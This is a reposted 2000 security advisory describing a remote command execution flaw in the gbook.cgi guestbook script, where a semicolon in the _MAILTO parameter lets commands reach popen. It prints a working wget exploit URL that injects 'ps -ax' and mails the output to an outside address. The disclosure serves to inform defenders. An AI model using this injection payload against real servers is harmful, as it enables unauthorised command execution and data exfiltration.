Advisories : gbook.cgi remote command execution vulnerability

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : gbook.cgi remote command execution vulnerability

Title:	gbook.cgi remote command execution vulnerability
Released by:	Bill Kendrick
Date:	10th November 2000
Printable version:	Click here

   Bug Report



1. Name: gbook.cgi remote command execution vulnerability

2. Release Date: 2000.11.10

3. Affected Application:

  GBook - A web site guestbook

     By Bill Kendrick

     kendrick@zippy.sonoma.edu

     http://zippy.sonoma.edu/kendrick/

4. Author: mat@hacksware.com

5. Type: Input validation Error



6. Explanation

 gbook.cgi is used by some web sites.

 We can set _MAILTO parameter, and popen is called to execute mail command.

 If ';' is used in _MAILTO variable, you can execute arbitrary command with it.

 It's so trivial. :)

7. Exploits

 This exploit executes "ps -ax" command and sends the result to haha@yaho.com.



 wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"





=================================================

|               mat@hacksware.com               |

|             http://hacksware.com              |

=================================================